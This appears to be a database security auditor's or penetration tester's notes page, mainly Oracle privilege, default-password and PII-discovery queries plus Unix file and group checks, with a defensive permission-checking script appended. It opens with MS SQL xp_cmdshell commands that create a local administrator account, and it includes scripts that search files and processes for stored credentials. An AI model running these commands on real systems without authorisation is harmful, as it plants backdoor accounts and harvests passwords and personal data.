database_stuff

MS SQL Server

exec xp_cmdshell 'dir c:\'
exec xp_cmdshell 'net user borat Password123 /add'
exec xp_cmdshell 'net localgroup administrators borat /add'

Oracle

If we have an Open account what could we check for?

Check its privileges and learn about that account.

Object Privileges Views

select * from ALL_TAB_PRIVS;
select * from ROLE_TAB_PRIVS;

select * from ALL_SYS_PRIVS;
select * from ROLE_SYS_PRIVS;

select * from ALL_USERS;

List all object privileges

SELECT GRANTEE,
       OWNER,
       GRANTOR,
       PRIVILEGE,
       GRANTABLE
FROM DBA_TAB_PRIVS
ORDER BY GRANTEE;

List all system privilege grants made to roles and users

SELECT * FROM DBA_SYS_PRIVS;

List of all object privileges

SELECT TABLE_NAME, PRIVILEGE, GRANTABLE
FROM DBA_TAB_PRIVS;

List all the column-specific privileges

SELECT GRANTEE, 
    TABLE_NAME, 
    COLUMN_NAME, 
    PRIVILEGE
FROM DBA_COL_PRIVS;

List all roles granted to other roles

SELECT * FROM ROLE_ROLE_PRIVS;

List all system privileges granted to roles

SELECT * FROM ROLE_SYS_PRIVS;

List all table privileges granted to roles

SELECT * FROM ROLE_TAB_PRIVS;

Check to see if PII data columns are visible

-- All the following are PII elements.

-- ssn
-- bank account number
-- first
-- last
-- full name
-- address
-- dob
-- mother's maiden
-- medical
-- fingerprints
-- photo
-- passport data
-- disciplinary data
-- driver's license no
-- email
-- telephone

select     object_name object, 
    object_type type, 
    owner owner
from     dba_objects
where owner<>'SYS'
and ((upper(object_name) like '%USER%'
-- escape the underscore so it matches a literal "_" and not any single character
and upper(object_name) not like 'USER\_%' escape '\')
or upper(object_name) like '%USR%'
or upper(object_name) like '%PASSWD%'
or upper(object_name) like '%PWD%'
or upper(object_name) like '%PASS%'
or upper(object_name) like '%SSN%'
or upper(object_name) like '%SOCIAL%'
or upper(object_name) like '%TAX%'
or upper(object_name) like '%ACCOUNT%'
or upper(object_name) like '%ACCOUNT%NUM%'
or upper(object_name) like '%FIRST%'
or upper(object_name) like '%LAST%'
or upper(object_name) like '%NAME%'
or upper(object_name) like '%ADDRESS%'
or upper(object_name) like '%ADD%'
or upper(object_name) like '%DOB%'
or upper(object_name) like '%BIRTH%'
or upper(object_name) like '%MOTHER%'
or upper(object_name) like '%MAIDEN%'
or upper(object_name) like '%MEDICAL%'
or upper(object_name) like '%FINGER%'
or upper(object_name) like '%PHOTO%'
or upper(object_name) like '%PASSPORT%'
or upper(object_name) like '%DRIVER%'
or upper(object_name) like '%DRVR%'
or upper(object_name) like '%MAIL%'
or upper(object_name) like '%TEL%'
or upper(object_name) like '%TELEPHONE%'
or upper(object_name) like '%PASS%'
)
and object_type in('VIEW','TABLE')
union
select     table_name object,
     column_name type,
     owner owner
from     dba_tab_columns
where owner<>'SYS'
and (upper(column_name) like '%USER%'
or upper(column_name) like '%USR%'
or upper(column_name) like '%PASSWD%'
or upper(column_name) like '%PWD%'
or upper(column_name) like '%PASS%'
or upper(column_name) like '%SSN%'
or upper(column_name) like '%SOCIAL%'
or upper(column_name) like '%TAX%'
or upper(column_name) like '%ACCOUNT%'
or upper(column_name) like '%ACCOUNT%NUM%'
or upper(column_name) like '%FIRST%'
or upper(column_name) like '%LAST%'
or upper(column_name) like '%NAME%'
or upper(column_name) like '%ADDRESS%'
or upper(column_name) like '%ADD%'
or upper(column_name) like '%DOB%'
or upper(column_name) like '%BIRTH%'
or upper(column_name) like '%MOTHER%'
or upper(column_name) like '%MAIDEN%'
or upper(column_name) like '%MEDICAL%'
or upper(column_name) like '%FINGER%'
or upper(column_name) like '%PHOTO%'
or upper(column_name) like '%PASSPORT%'
or upper(column_name) like '%DRIVER%'
or upper(column_name) like '%DRVR%'
or upper(column_name) like '%MAIL%'
or upper(column_name) like '%TEL%'
or upper(column_name) like '%TELEPHONE%'
)
/

Check to see if the account could INSERT or UPDATE data to other schema objects

select *
from all_tab_privs
order by grantor;

Using our Scan account, what can we check for?

Select from the DBA_USERS_WITH_DEFPWD data dictionary view

SELECT * FROM DBA_USERS_WITH_DEFPWD;

The DBA_USERS_WITH_DEFPWD view lists the accounts that still have their default passwords.

Find all users and their associated information as defined in the database

SELECT USERNAME, PROFILE, ACCOUNT_STATUS 
        FROM DBA_USERS;

Check privileges and learn about all the accounts.

List all object privileges

SELECT GRANTEE,
       OWNER,
       GRANTOR,
       PRIVILEGE,
       GRANTABLE
FROM DBA_TAB_PRIVS
ORDER BY GRANTEE;

List all system privilege grants made to roles and users

SELECT * FROM DBA_SYS_PRIVS;

List of all object privileges

SELECT TABLE_NAME, PRIVILEGE, GRANTABLE
FROM DBA_TAB_PRIVS;

List all the column-specific privileges

SELECT GRANTEE, 
    TABLE_NAME, 
    COLUMN_NAME, 
    PRIVILEGE
FROM DBA_COL_PRIVS;

List all roles granted to other roles

SELECT * FROM ROLE_ROLE_PRIVS;

List all system privileges granted to roles

SELECT * FROM ROLE_SYS_PRIVS;

List all table privileges granted to roles

SELECT * FROM ROLE_TAB_PRIVS;

Check to see if any of the use simple password cracker SQL to get all the User access

Check for the Version and Patch levels

Check to see the Parameters set for the ORACLE implementation

If we have the SYS or SYSTEM or DBA level access, what should we check for?

Use the DBA_TS_QUOTAS view to list all tablespace quotas specifically assigned to each user.

SELECT * FROM DBA_TS_QUOTAS;

The DBA_PROFILES view lists all profiles in the database and the associated settings for each limit in each profile.

SELECT * FROM DBA_PROFILES
        ORDER BY PROFILE;

To find the memory use for each user session, query the V$SESSION view.

SELECT USERNAME, VALUE || 'bytes' "Current UGA memory"
FROM V$SESSION sess, V$SESSTAT stat, V$STATNAME name
WHERE sess.SID = stat.SID
AND stat.STATISTIC# = name.STATISTIC#
AND name.NAME = 'session uga memory';

The username and password are entered into the database link. (10g or earlier)

SELECT DB_LINK, OWNER_ID FROM V$DBLINK;

If we get access to the UNIX server that has Oracle installed, what should we check for?

Check to see the $ORACLE_HOME access and privileges

Check the umask for the oracle account

Make sure that files created by the oracle account will have secure permissions by default. (umask 022)

Check to see that the oracle account is not part of the root group

i. cat /etc/group

Check to see that no other OS account is in the dba group

ii. cat /etc/group

Check the .dbf file permissions. They should be 600, as oracle is the account that runs the database

Check to see that no other OS account is in the dba group

iii. cat /etc/group

Oracle raw devices should have minimum permissions so only Oracle can use them.

iv. ls -al device/disk/volume

Usernames/passwords in the process list.

v. ps -aef

Usernames/passwords in scripts.

#!/bin/bash
# For every file under $ORACLE_HOME, log its name and any lines that mention connect or sqlplus
find "$ORACLE_HOME" -name "*" -print | while read -r filename
do
  echo "filename $filename" >> user.lis
  egrep -I 'connect|sqlplus' "$filename" >> user.lis 2>/dev/null
done

Usernames/passwords in environment variables.

Control files (.ctl) should be readable and writable only by oracle.

Check if export files are accessible on the system. (This file will have USER$ and can be extracted.)

# Log any lines under $ORACLE_HOME that mention EXPORT
find "$ORACLE_HOME" -name "*" -print | while read -r filename
do
  egrep -I 'EXPORT' "$filename" >> exp.lis 2>/dev/null
done
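
The group, .dbf and .ctl checks above can be scripted instead of read by eye from cat /etc/group and ls output. The following is an added example, not part of the original page: the function names and the fixture are hypothetical, the account name oracle and the groups root and dba are taken from the checks above, and only supplementary membership listed in the group file is examined (a primary group set in /etc/passwd is not).

```bash
#!/bin/bash
# Added example: flag extra dba/root group members and loose datafile modes.

# Members of group $2 in group file $1 (name:passwd:gid:member,member), one per line.
group_members() {
  awk -F: -v g="$2" '$1 == g { n = split($4, m, ","); for (i = 1; i <= n; i++) print m[i] }' "$1"
}

# Findings: oracle listed in the root group, or anyone but oracle listed in dba.
group_findings() {
  group_members "$1" root | grep -qx oracle && echo "oracle is in group root"
  group_members "$1" dba | grep -vx oracle | sed 's/^/non-oracle member of dba: /'
}

# Findings: .dbf not exactly mode 600, or .ctl with any group/other permission bit.
file_findings() {
  find "$1" -type f \( -name '*.dbf' -o -name '*.ctl' \) -print | sort |
  while IFS= read -r f; do
    mode=$(ls -ld "$f" | cut -c1-10)
    case "$f" in
      *.dbf) [ "$mode" = "-rw-------" ] || echo "$mode ${f#"$1"/}" ;;
      *.ctl) [ "${mode#????}" = "------" ] || echo "$mode ${f#"$1"/}" ;;
    esac
  done
}

# Constructed fixture (not a real system): a group file and four database files.
make_fixture() {
  d=$(mktemp -d) || return 1
  printf 'root:x:0:\ndba:x:501:oracle,appuser\n' > "$d/group"
  for spec in 600:system01.dbf 640:users01.dbf 600:control01.ctl 664:control02.ctl; do
    : > "$d/${spec#*:}" && chmod "${spec%%:*}" "$d/${spec#*:}"
  done
  echo "$d"
}

# Run both checks against the constructed fixture and print the findings.
fx=$(make_fixture)
group_findings "$fx/group"
file_findings "$fx"
rm -rf "$fx"
```

On a real host, point group_findings at /etc/group and file_findings at the directory that holds the datafiles and control files.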